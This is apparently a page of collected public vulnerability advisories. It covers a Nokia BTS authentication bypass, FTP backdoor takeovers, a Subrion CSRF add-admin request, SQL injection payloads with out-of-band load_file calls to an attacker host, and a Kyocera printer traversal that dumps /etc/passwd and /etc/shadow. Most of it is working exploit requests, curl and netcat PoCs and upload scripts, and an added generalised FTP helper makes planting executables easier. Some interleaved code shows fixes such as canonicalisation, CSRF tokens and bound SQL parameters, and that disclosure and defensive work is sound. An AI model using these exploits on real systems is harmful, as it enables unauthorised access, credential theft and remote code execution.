<pre><code> title: Nokia Transport Module Authentication Bypass<br /> case id: CM-2020-02<br /> product: BTS TRS web console (FTM_W20_FP2_2019.08.16_0010)<br /> vulnerability type: Authentication Bypass<br /> severity: Critical<br /> found: 2020-09-28<br /> CVE: CVE-2021-31932<br /> by: Cristiano Maruti (@cmaruti)<br /><br />[EXECUTIVE SUMMARY]<br /><br /> The TRS web console allows an authenticated user to remotely manage the BTS<br /> and its configuration. The analysis discovered an authentication bypass<br /> vulnerability (CWE-289, authentication bypass by alternate name) in the web<br /> management console. An unauthenticated attacker can reach every function<br /> exposed via the web panel, circumventing the authentication process. The<br /> vulnerability lies in the way the web server in use (lighttpd) protects<br /> restricted resources and in how special characters are encoded and passed<br /> to the underlying CGIs: replacing a single character of a protected URL with<br /> its percent-encoded form is enough to skip the authentication check while<br /> still reaching the same CGI. A successful attack can read data from the BTS<br /> and read, modify or delete the BTS configuration.<br /><br />[VULNERABLE VERSIONS]<br /><br /> The following version of the TRS web console was affected by the<br /> vulnerability; previous versions may be vulnerable as well:<br /> - BTS TRS web console (FTM_W20_FP2_2019.08.16_0010)<br /><br />[TECHNICAL DETAILS]<br /><br />It is possible to reproduce the vulnerability by following these steps:<br />1. Open a web browser and enter the BTS TRS web console IP address<br />2. Navigate to a protected resource (for example<br />/protected/ShowErrorLog.cgi)<br />3. Substitute the dot character with its URL-encoded value<br />(%2e)<br />4. 
The resulting URL<br />(/protected/ShowErrorLog%2ecgi?token=thisIsNotTheRightToken)<br /> is served without any prompt for authentication credentials; the<br /> deliberately wrong token value is not rejected either.<br /><br />Below is a full transcript of the HTTP request used to access a protected<br />resource (%2e and %2E are equivalent encodings of the dot).<br /><br />HTTP Request<br />-------------------------------------------------------------------------------<br />GET /protected/ShowErrorLog%2Ecgi?token=thisIsNotTheRightToken HTTP/1.1<br />Host: <targetip><br />User-Agent: curl/7.67.0<br />Accept: */*<br /><br />-------------------------------------------------------------------------------<br />cURL PoC (the URL is quoted so that the shell does not treat & as a<br />background operator)<br />-------------------------------------------------------------------------------<br /># curl -vk 'https://<targetip>/protected/ShowErrorLog%2Ecgi?token=thisIsNotTheRightToken&frame=showLogFile'<br /><br /><br />[VULNERABILITY REFERENCE]<br />MITRE assigned the following CVE ID to the vulnerability: CVE-2021-31932<br /><br />[DISCLOSURE TIMELINE]<br />2020-10-06: Contacted Nokia PSIRT and shared the details of the<br />vulnerability<br />2020-10-07: Nokia PSIRT acknowledged receipt of the message.<br />2020-10-12: Vendor engineering team confirmed the vulnerability and is working<br />on a patch (estimated time: end of 2020).<br />2021-04-30: Researcher requested a CVE assignment through the MITRE CVE<br />Assignment Team; CVE-2021-31932 allocated<br />2021-05-01: Researcher notified the vendor of the assigned CVE number<br />2022-02-08: Researcher asked for permission to publicly release the report;<br />Nokia PSIRT acknowledged<br />2022-02-10: Public release<br /><br /><br />-- <br /><br />Cristiano Maruti<br />about.me/cmaruti<br /><br /><br /></code></pre>
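The advisory pins the bypass on how lighttpd protects the resource and how encoded characters reach the CGI. The simplest model consistent with the PoC is an access rule evaluated on the path exactly as it appears in the request line, while the CGI layer percent-decodes the path before dispatching. The following is an added example written for this page, not code from the advisory or from Nokia, and the regex `^/protected/.*\.cgi$` is an assumed stand-in for whatever rule the BTS actually used. It shows the mismatch and the fix: canonicalise (decode until stable, collapse dot segments) before matching, so the check sees the same string the CGI dispatcher acts on.

```python
import re
from urllib.parse import unquote

# Illustrative rule only: the advisory does not reproduce the BTS's lighttpd
# configuration. It stands in for any access rule keyed on the literal
# "/protected/...cgi" spelling of the path.
PROTECTED_RE = re.compile(r"^/protected/.*\.cgi$")


def canonicalize(raw_target: str) -> str:
    """Bring a request target into the form the CGI dispatcher will act on:
    drop the query string, percent-decode until stable (so %252e -> %2e -> .)
    and collapse '.' and '..' segments."""
    path = raw_target.split("?", 1)[0]
    for _ in range(3):                      # bounded: junk can't loop forever
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    parts = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if parts:
                parts.pop()
            continue
        parts.append(seg)
    return "/" + "/".join(parts)


def requires_auth_vulnerable(raw_target: str) -> bool:
    """The bug class from the advisory: the rule is matched against the path
    as sent, so 'ShowErrorLog%2ecgi' does not contain the literal '.cgi'
    and is not treated as protected."""
    return PROTECTED_RE.match(raw_target.split("?", 1)[0]) is not None


def requires_auth_fixed(raw_target: str) -> bool:
    """Decide on the canonical path, i.e. the string the CGI layer uses."""
    return PROTECTED_RE.match(canonicalize(raw_target)) is not None


def serve(raw_target: str, authenticated: bool, requires_auth) -> str:
    """Toy front end: enforce the rule, then dispatch on the decoded path,
    which is why the encoded and plain spellings reach the same CGI."""
    if requires_auth(raw_target) and not authenticated:
        return "401 Unauthorized"
    return "200 ran " + canonicalize(raw_target)
```

When checking a device after a fix, request the plain and the encoded spelling of a protected URL without credentials; a correct server answers both the same way, and double-encoded (`%252E`) or dot-segment (`/protected/../protected/...`) variants should not change that.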
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/fc8eaa2a5752b509dbd02989d8d9f2e2.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.FTP.Matiteman<br />Vulnerability: Weak Hardcoded Password<br />Description: The malware listens on TCP port 21 and requires authentication for remote access. However, the credentials (username and password are both "matiteman") are weak and hardcoded in plaintext within the executable.<br />Type: PE32<br />MD5: fc8eaa2a5752b509dbd02989d8d9f2e2<br />Vuln ID: MVID-2021-0425<br />Disclosure: 12/11/2021 <br /><br />Exploit/PoC:<br />nc64.exe 192.168.18.125 21<br />welcome to mtm ftp server<br />USER matiteman<br />331 Password required for matiteman.<br />PASS matiteman<br />230 User matiteman logged in.<br />SYST<br />215 UNIX Type: L8 Internet Component Suite<br />CDUP<br />250 CWD command successful. "c:/" is current directory.<br />PASV<br />227 Entering Passive Mode (192,168,18,125,194,37).<br />STOR DOOM-SM.exe<br />150 Opening data connection for DOOM-SM.exe.<br />226 File received ok<br /><br />from socket import *<br /><br />MALWARE_HOST="192.168.18.125"<br />PORT=49701        # data port from the PASV reply above: 194*256+37<br />DOOM="DOOM-SM.exe"<br /><br />def doit():<br />    # connect to the passive data port announced by the 227 reply, then<br />    # stream the file exactly once while STOR is issued on the control channel<br />    s=socket(AF_INET, SOCK_STREAM)<br />    s.connect((MALWARE_HOST, PORT))<br /><br />    with open(DOOM, "rb") as f:<br />        chunk = f.read(4096)<br />        while chunk:<br />            s.sendall(chunk)<br />            chunk = f.read(4096)<br /><br />    s.close()<br /><br />    print("By Malvuln")<br /><br />if __name__=="__main__":<br />    doit()<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Admin)<br /># Date: 2022-02-09<br /># Exploit Author: Aryan Chehreghani<br /># Vendor Homepage: https://subrion.org<br /># Software Link: https://subrion.org/download<br /># Version: 4.2.1<br /># Tested on: Windows 10<br /><br /># [ About - Subrion CMS ]: <br /># Subrion is a PHP/MySQL-based CMS and framework that allows you to build<br /># websites for any purpose, from a blog to a corporate portal.<br /><br /># [ Description ]:<br /># A CSRF vulnerability was discovered in version 4.2.1 of Subrion CMS.<br /># The admin panel's member-add form (/panel/members/add/) can be submitted on<br /># behalf of a logged-in administrator, so an attacker who gets the admin to<br /># load a page they control can add a new user (the request below sets<br /># usergroup_id=1 and status=active). The form is multipart/form-data, so a<br /># plain HTML form on any origin can submit it; when reproducing, check how the<br /># server treats the __st form field seen in the capture.<br /><br /># [ Sample CSRF Request ]:<br /><br />POST /subrion/panel/members/add/ HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------386122140640094420852486902<br />Content-Length: 2522<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/subrion/panel/members/add/<br />Cookie: loader=loaded; INTELLI_ffd8ae8438=ftph4lgam8hugh8j0mgv8j4q2l<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />-----------------------------386122140640094420852486902<br />Content-Disposition: form-data; name="__st"<br /><br />YNXrr7MjSY0Qi0JYISJ7DRuC9Gd1zxPYwjHcFKVh<br />-----------------------------386122140640094420852486902<br />Content-Disposition: form-data; name="username"<br /><br />Aryan<br />-----------------------------386122140640094420852486902<br />Content-Disposition: form-data; name="fullname"<br /><br />AryanChehreghani<br 
/>-----------------------------386122140640094420852486902<br />Content-Disposition: form-data; name="email"<br /><br />aryanchehreghani@yahoo.com<br />-----------------------------386122140640094420852486902<br />Content-Disposition: form-data; name="_password"<br /><br />Test1234!<br />-----------------------------386122140640094420852486902<br />Content-Disposition: form-data; name="_password2"<br /><br />Test1234!<br />-----------------------------386122140640094420852486902<br />Content-Disposition: form-data; name="usergroup_id"<br /><br />1<br />-----------------------------386122140640094420852486902<br />Content-Disposition: form-data; name="website"<br /><br /><br />-----------------------------386122140640094420852486902<br />Content-Disposition: form-data; name="phone"<br /><br /><br />-----------------------------386122140640094420852486902<br />Content-Disposition: form-data; name="biography"<br /><br /><br />-----------------------------386122140640094420852486902<br />Content-Disposition: form-data; name="facebook"<br /><br /><br />-----------------------------386122140640094420852486902<br />Content-Disposition: form-data; name="twitter"<br /><br /><br />-----------------------------386122140640094420852486902<br />Content-Disposition: form-data; name="gplus"<br /><br /><br />-----------------------------386122140640094420852486902<br />Content-Disposition: form-data; name="linkedin"<br /><br /><br />-----------------------------386122140640094420852486902<br />Content-Disposition: form-data; name="email_language"<br /><br />en<br />-----------------------------386122140640094420852486902<br />Content-Disposition: form-data; name="sponsored"<br /><br />0<br />-----------------------------386122140640094420852486902<br />Content-Disposition: form-data; name="featured"<br /><br />0<br />-----------------------------386122140640094420852486902<br />Content-Disposition: form-data; name="featured_end"<br /><br />2022-03-09 12:03<br 
/>-----------------------------386122140640094420852486902<br />Content-Disposition: form-data; name="status"<br /><br />active<br />-----------------------------386122140640094420852486902<br />Content-Disposition: form-data; name="save"<br /><br />1<br />-----------------------------386122140640094420852486902<br />Content-Disposition: form-data; name="goto"<br /><br />list<br />-----------------------------386122140640094420852486902--<br /><br /></code></pre>
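The captured request above carries the admin's session cookie, an `Origin`/`Sec-Fetch-Site` pair that a forged cross-site submission cannot spoof, and a `__st` form field. The following is an added example, my own code and not Subrion's, of the server-side decision a panel handler should make: the vulnerable version only asks whether someone is logged in; the fixed version requires the submitted `__st` to equal the token stored in the session (constant-time compare) and additionally refuses requests whose fetch metadata or `Origin` positively say they came from another site. Names such as `allow_member_add_fixed`, `site_host` and the sample sessions and headers are mine; the `attacker.example` origin is constructed.

```python
import hmac
import secrets
from urllib.parse import urlsplit


def new_session_token() -> str:
    """Anti-CSRF token generated at login and kept in the server-side session."""
    return secrets.token_urlsafe(32)


def _positively_cross_site(headers: dict, site_host: str) -> bool:
    """Fetch-metadata / Origin check. Only a header that says the request came
    from elsewhere counts; missing headers (old browsers, curl) fall through to
    the token comparison, which stays the primary defence."""
    sfs = headers.get("Sec-Fetch-Site")
    if sfs is not None and sfs not in ("same-origin", "same-site", "none"):
        return True
    origin = headers.get("Origin")
    if origin is not None:
        if origin == "null" or urlsplit(origin).hostname != site_host:
            return True
    return False


def allow_member_add_vulnerable(form: dict, session: dict, headers: dict,
                                site_host: str = "localhost") -> bool:
    """Handler that only asks 'is someone logged in?'. Any page that makes the
    administrator's browser submit the form gets a member created."""
    return session.get("user_id") is not None


def allow_member_add_fixed(form: dict, session: dict, headers: dict,
                           site_host: str = "localhost") -> bool:
    """Logged in, not positively cross-site, and the __st field equals the
    token stored in this session (constant-time compare)."""
    if session.get("user_id") is None:
        return False
    if _positively_cross_site(headers, site_host):
        return False
    expected = session.get("csrf_token")
    supplied = form.get("__st")
    if not expected or not supplied:
        return False
    return hmac.compare_digest(expected, supplied)


# Constructed sample data modelled on the captured request above.
ADMIN_SESSION = {"user_id": 1, "csrf_token": new_session_token()}
LEGIT_HEADERS = {"Origin": "http://localhost",
                 "Referer": "http://localhost/subrion/panel/members/add/",
                 "Sec-Fetch-Site": "same-origin"}
FORGED_HEADERS = {"Origin": "http://attacker.example",    # constructed origin
                  "Sec-Fetch-Site": "cross-site"}
FORM_FIELDS = {"username": "Aryan", "usergroup_id": "1", "status": "active"}
```

The token must be bound to the session and compared server-side; a static or guessable `__st` value would give the fetch-metadata check alone the job, and that check is deliberately permissive for clients that send no such headers.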
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/8b484576f928c256277016104cc364c2_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.BackAttack.20<br />Vulnerability: Authentication Bypass RCE<br />Description: BackAtTack 2.0 by CurrenTChaoSGroup (CCG) by default listens on TCP ports 80 and 11131. The malware features a remote web interface from which its FTP server can be enabled; the FTP service then listens on TCP port 21. Third-party attackers who can reach an infected system can log on with any username/password combination. Intruders may then upload executables using the FTP PASV and STOR commands, which can result in remote code execution.<br />Type: PE32<br />MD5: 8b484576f928c256277016104cc364c2<br />Vuln ID: MVID-2021-0424<br />Disclosure: 12/11/2021<br /><br />Exploit/PoC:<br />nc64.exe 192.168.18.125 21<br />220 httP://www.CurrenTChaoS.Tk - BackAtTack2.0 ftp server-<br />USER malvuln<br />331 Password required for malvuln.<br />PASS malvuln<br />230 User malvuln logged in.<br />SYST<br />215 UNIX Type: L8 Internet Component Suite<br />CDUP<br />250 CWD command successful. "C:/" is current directory.<br />PASV<br />227 Entering Passive Mode (192,168,18,125,194,33).<br />STOR DOOM-SM.exe<br />150 Opening data connection for DOOM-SM.exe.<br />226 File received ok<br /><br />from socket import *<br /><br />MALWARE_HOST="192.168.18.125"<br />PORT=49697        # data port from the PASV reply above: 194*256+33<br />DOOM="DOOM-SM.exe"<br /><br />def doit():<br />    # connect to the passive data port announced by the 227 reply, then<br />    # stream the file exactly once while STOR is issued on the control channel<br />    s=socket(AF_INET, SOCK_STREAM)<br />    s.connect((MALWARE_HOST, PORT))<br /><br />    with open(DOOM, "rb") as f:<br />        chunk = f.read(4096)<br />        while chunk:<br />            s.sendall(chunk)<br />            chunk = f.read(4096)<br /><br />    s.close()<br /><br />    print("By Malvuln")<br /><br />if __name__=="__main__":<br />    doit()<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. 
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
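Both FTP backdoor advisories above (Matiteman, MVID-2021-0425, and BackAtTack 2.0, MVID-2021-0424) drive the control channel by hand with nc and hardcode the data port that the `227` reply announced. The following is an added example of my own, not Malvuln's PoC, that does the whole exchange from one client: log in, send `PASV`, parse the `(h1,h2,h3,h4,p1,p2)` tuple into host and port, open the data connection and `STOR` the file. It reads the banner without expecting a `220` code because Matiteman's greeting (`welcome to mtm ftp server`) has none, and a strict client would stop there. Host, credentials and file name are arguments; `loopback_exchange` is an offline self-check over a socketpair and is not part of the protocol.

```python
import re
import socket
from typing import Tuple

PASV_RE = re.compile(r"\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)")


def parse_pasv(reply: str) -> Tuple[str, int]:
    """'227 Entering Passive Mode (h1,h2,h3,h4,p1,p2).' -> ('h1.h2.h3.h4', p1*256+p2)."""
    m = PASV_RE.search(reply)
    if not reply.startswith("227") or m is None:
        raise ValueError("not a PASV reply: %r" % reply)
    h1, h2, h3, h4, p1, p2 = (int(x) for x in m.groups())
    return "%d.%d.%d.%d" % (h1, h2, h3, h4), p1 * 256 + p2


def read_line(sock: socket.socket) -> str:
    """Read one CRLF-terminated reply line (byte at a time; replies are short)."""
    buf = bytearray()
    while not buf.endswith(b"\n"):
        b = sock.recv(1)
        if not b:
            break
        buf += b
    return buf.decode("latin-1").rstrip("\r\n")


def command(sock: socket.socket, line: str) -> str:
    """Send one control-channel command and return the single reply line."""
    sock.sendall((line + "\r\n").encode("latin-1"))
    return read_line(sock)


def expect(reply: str, code: str) -> str:
    if not reply.startswith(code):
        raise RuntimeError("expected %s, got %r" % (code, reply))
    return reply


def ftp_upload(host: str, user: str, password: str, remote_name: str,
               data: bytes, port: int = 21, timeout: float = 10.0) -> str:
    """Log in, enter passive mode, connect to the announced data port and STOR
    `data` as `remote_name`. Returns the server's final reply ('226 ...')."""
    ctrl = socket.create_connection((host, port), timeout=timeout)
    try:
        read_line(ctrl)   # banner; Matiteman's has no 3-digit code, so don't expect '220'
        expect(command(ctrl, "USER " + user), "331")
        expect(command(ctrl, "PASS " + password), "230")
        data_host, data_port = parse_pasv(expect(command(ctrl, "PASV"), "227"))
        dataconn = socket.create_connection((data_host, data_port), timeout=timeout)
        try:
            expect(command(ctrl, "STOR " + remote_name), "150")
            dataconn.sendall(data)
        finally:
            dataconn.close()          # closing the data channel marks end of file
        return expect(read_line(ctrl), "226")
    finally:
        ctrl.close()


def loopback_exchange(cmd: str, canned_reply: bytes) -> Tuple[str, bytes]:
    """Offline self-check: run `command` against a socketpair peer that already
    has `canned_reply` queued; returns (parsed reply, raw bytes the peer saw)."""
    a, b = socket.socketpair()
    try:
        b.sendall(canned_reply)
        reply = command(a, cmd)
        return reply, b.recv(256)
    finally:
        a.close()
        b.close()
```

Against Matiteman the call is `ftp_upload("192.168.18.125", "matiteman", "matiteman", "DOOM-SM.exe", open("DOOM-SM.exe", "rb").read())`; against BackAtTack 2.0 any username and password pair is accepted once the FTP server has been switched on through the web interface.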
<pre><code># Exploit Title: Accounting Journal Management System 1.0 - 'id' SQLi (Authenticated)<br /># Exploit Author: Alperen Ergel<br /># Contact: @alpernae (IG/TW)<br /># Software Homepage: https://www.sourcecodester.com/php/15155/accounting-journal-management-system-trial-balance-php-free-source-code.html<br /># Version : 1.0<br /># Tested on: Windows 10 XAMPP | Kali Linux<br /># Category: WebApp<br /># Google Dork: N/A<br /># Date: 09.02.2022<br /><br />######## Description ########<br />#<br /># Authenticate to the admin panel and open the user management page<br /># (?page=user/manage_user). Its id parameter is placed into the SQL query<br /># unsanitised; the payload below (decoded:<br /># 5' AND (SELECT 8928 FROM (SELECT(SLEEP(10)))hVPW) AND 'qHYS'='qHYS)<br /># delays the response by about 10 seconds, which confirms time-based<br /># blind SQL injection.<br />#<br />######## Proof of Concept ########<br /><br />========>>> REQUEST <<<=========<br /><br />GET /ajms/admin/?page=user/manage_user&id=5%27%20AND%20(SELECT%208928%20FROM%20(SELECT(SLEEP(10)))hVPW)%20AND%20%27qHYS%27=%27qHYS HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Cookie: PHPSESSID=r513r6hug9aqofhlfs3bc7f7qa<br />Upgrade-Insecure-Requests: 1<br /><br /><br /></code></pre>
<pre><code>## [Simple Forum-Discussion System 1.0](https://www.sourcecodester.com/php/14525/simple-forumdiscussion-system-using-phpmysql-source-code.html)<br /><br />## [Vendor](https://www.sourcecodester.com/users/tips23)<br /><br />![](https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/oretnom23/Forum-Discussion-System-1.0/docs/forum.png)<br /><br />## Description:<br />Multiple SQL injections were found in Simple Forum-Discussion System<br />1.0, for example in three scripts: manage_topic.php, manage_user.php<br />and ajax.php. An attacker can retrieve all information from the<br />application's database through them. The sqlmap output below lists the<br />injectable parameters (`id` via GET, `username` via POST) with the<br />payload types that succeeded; the `load_file()` calls point at an<br />attacker-controlled UNC host name for out-of-band confirmation.<br /><br /><br />[+]Payloads:<br /><br />```mysql<br />Parameter: id (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: id=(select<br />load_file('\\\\c7kvyxxyc2i5yh8l3p6byhxtxk3drff6hu8hy5n.nu11secur1tyPenetrationTestingEngineer.net\\nix'))<br />AND (SELECT 4985 FROM (SELECT(SLEEP(5)))Eggb)<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 4 columns<br /> Payload: id=(select<br />load_file('\\\\c7kvyxxyc2i5yh8l3p6byhxtxk3drff6hu8hy5n.nu11secur1tyPenetrationTestingEngineer.net\\nix'))<br />UNION ALL SELECT<br />NULL,NULL,CONCAT(0x7162627871,0x564c7a5164475979514c4879487159576946726147756c7746504d696a5a6c6554547345776f4d61,0x716a7a7171),NULL,NULL,NULL--<br />-<br />```<br /><br /><br />```mysql<br />Parameter: id (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: id=135628119 or 8604=08604 AND 5328=5328&mtype=own<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: id=135628119 or 8604=08604 AND (SELECT 6263 FROM<br />(SELECT(SLEEP(5)))lewZ)&mtype=own<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 5 columns<br /> Payload: id=-6332 UNION ALL SELECT<br 
/>CONCAT(0x7176766b71,0x4b717847474f67485458796b544c50486c656e637779445a6c506b63756d564a544f665364557772,0x7171707871),NULL,NULL,NULL,NULL--<br />-&mtype=own<br />```<br /><br /><br />```mysql<br />Parameter: username (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: username=GnxaCRMw'+(select<br />load_file('\\\\p2s8tasb7fditu3yy21otus6sxyqmjg77av2is6h.nu11secur1tyPenetrationTestingEngineer.net\\fnu'))+''<br />AND (SELECT 1271 FROM (SELECT(SLEEP(5)))MBvz) AND<br />'eIbF'='eIbF&password=t4F!v8o!H8<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/Forum-Discussion-System-1.0)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/439w8c)<br /><br /><br /><br /></code></pre>
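The two advisories above (Accounting Journal Management System and Simple Forum-Discussion System) both inject through an `id` parameter that is concatenated into the query text, and the sqlmap output shows the three payload shapes that result: time-based (`SLEEP`), boolean-based (`or 8604=08604 AND 5328=5328`) and `UNION ALL SELECT` with a matching column count. The following is an added example of mine, not code from either project; sqlite3 stands in for MySQL, so `SLEEP()` and `load_file()` are unavailable and the demonstration uses the boolean and UNION shapes. The schema, rows and the `get_topic_*` function names are constructed for the example.

```python
import sqlite3
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the forum's schema; MySQL-only functions such
    as SLEEP() and load_file() are not available in sqlite3."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE topics(id INTEGER PRIMARY KEY, title TEXT, body TEXT, author INTEGER);
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO topics VALUES (1, 'hello', 'first post', 1);
        INSERT INTO users  VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return con


def get_topic_vulnerable(con: sqlite3.Connection, topic_id: str) -> List[Tuple]:
    """The pattern behind 'manage_topic.php?id=': the parameter is pasted into
    the SQL text, so quotes, OR and UNION inside it become SQL."""
    sql = "SELECT id, title, body, author FROM topics WHERE id = " + topic_id
    return con.execute(sql).fetchall()


def get_topic_fixed(con: sqlite3.Connection, topic_id: str) -> List[Tuple]:
    """Validate the shape, then bind the value; it can never be parsed as SQL."""
    if not topic_id.isdigit():
        return []
    return con.execute(
        "SELECT id, title, body, author FROM topics WHERE id = ?", (int(topic_id),)
    ).fetchall()


# Same shape as the sqlmap UNION payloads above: a non-existent id so only the
# UNION rows come back, and a column count equal to the original SELECT's.
UNION_PAYLOAD = "-1 UNION ALL SELECT id, username, password, NULL FROM users"

# Same shape as 'id=... or 8604=08604 AND 5328=5328': OR binds more loosely than
# AND, so the right-hand side is always true and every topic row matches.
BOOL_PAYLOAD = "999 or 8604=8604 AND 5328=5328"
```

For the time-based payloads, the equivalent check when you cannot see output is to time the request twice, once with `SLEEP(10)` and once with `SLEEP(0)` in the same position, rather than trusting a single slow response.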
<pre><code># Exploit Title: Kyocera Command Center RX ECOSYS M2035dn - Directory Traversal File Disclosure (Unauthenticated) <br /># Author: Luis Martinez<br /># Discovery Date: 2022-02-10<br /># Vendor Homepage: https://www.kyoceradocumentsolutions.com/asia/en/products/business-application/command-center-rx.html<br /># Tested Version: ECOSYS M2035dn<br /># Tested on: Linux<br /># Vulnerability Type: Directory Traversal File Disclosure (Unauthenticated)<br /><br /># Proof of Concept:<br /># 1.- Build a directory traversal path under a static directory (here /js/) that climbs to the target file<br /># 2.- Append a URL-encoded null byte (%00) and an allowed extension (.jpg); the extension check passes,<br />#     while the ETag in the response shows the server opened the path truncated at the null byte<br /># 3.- Send the request; no authentication is needed and the file comes back labelled image/jpeg<br /><br />Request 1:<br /><br />GET /js/../../../../../../../../etc/passwd%00.jpg HTTP/1.1<br />Cookie: rtl=0<br />Host: X.X.X.X<br />Connection: Keep-alive<br />Accept-Encoding: gzip,deflate<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)<br />Accept: */*<br /><br />Response 1:<br /><br />HTTP/1.1 200 OK<br />Content-Length: 844<br />Upgrade: TLS/1.0<br />Accept-Encoding: identity<br />Date: Thu, 10 Feb 2022 15:55:57 GMT<br />Server: KM-MFP-http/V0.0.1<br />Last-Modified: Thu, 10 Feb 2022 15:25:48 GMT<br />ETag: "/js/../../../../../../../../etc/passwd, Thu, 10 Feb 2022 15:25:48 GMT"<br />Content-Type: image/jpeg<br /><br />root:x:0:0:root:/root:/bin/sh<br />bin:x:1:1:bin:/bin:/bin/sh<br />daemon:x:2:2:daemon:/usr/sbin:/bin/sh<br />sys:x:3:3:sys:/dev:/bin/sh<br />adm:x:4:4:adm:/var/adm:/bin/sh<br />lp:x:5:7:lp:/var/spool/lpd:/bin/sh<br />sync:x:6:8:sync:/bin:/bin/sync<br />shutdown:x:7:9:shutdown:/sbin:/sbin/shutdown<br />halt:x:8:10:halt:/sbin:/sbin/halt<br />mail:x:9:11:mail:/var/mail:/bin/sh<br />news:x:10:12:news:/var/spool/news:/bin/sh<br />uucp:x:11:13:uucp:/var/spool/uucp:/bin/sh<br />operator:x:12:0:operator:/root:/bin/sh<br />games:x:13:60:games:/usr/games:/bin/sh<br />ftp:x:15:14:ftp:/var/ftp:/bin/sh<br />man:x:16:20:man:/var/cache/man:/bin/sh<br />www:x:17:18:www-data:/var/www:/bin/sh<br />sshd:x:18:19:sshd:/var/run/sshd:/bin/sh<br 
/>proxy:x:19:21:proxy:/bin:/bin/sh<br />telnetd:x:20:22:proxy:/bin:/bin/sh<br />backup:x:34:34:backup:/var/backups:/bin/sh<br />ais:x:101:101:ais:/var/run/ais:/bin/sh<br />nobody:x:65534:65534:nobody:/nonexistent:/bin/sh<br /><br />Request 2:<br /><br />GET /js/../../../../../../../../etc/shadow%00.jpg HTTP/1.1<br />Cookie: rtl=0<br />Host: X.X.X.X<br />Connection: Keep-alive<br />Accept-Encoding: gzip,deflate<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)<br />Accept: */*<br /><br />Response 2:<br /><br />HTTP/1.1 200 OK<br />Content-Length: 480<br />Upgrade: TLS/1.0<br />Accept-Encoding: identity<br />Date: Thu, 10 Feb 2022 16:10:16 GMT<br />Server: KM-MFP-http/V0.0.1<br />Last-Modified: Thu, 10 Feb 2022 15:25:48 GMT<br />ETag: "/js/../../../../../../../../etc/shadow, Thu, 10 Feb 2022 15:25:48 GMT"<br />Content-Type: image/jpeg<br /><br />root:$1$7NzW9Q4N$hXTtMygKjVUdJtW86EH3t1:15873::::::<br />bin:*:15873::::::<br />daemon:*:15873::::::<br />sys:*:15873::::::<br />adm:*:15873::::::<br />lp:*:15873::::::<br />sync:*:15873::::::<br />shutdown:*:15873::::::<br />halt:*:15873::::::<br />mail:*:15873::::::<br />news:*:15873::::::<br />uucp:*:15873::::::<br />operator:*:15873::::::<br />games:*:15873::::::<br />ftp:*:15873::::::<br />man:*:15873::::::<br />www:*:15873::::::<br />sshd:*:15873::::::<br />proxy:*:15873::::::<br 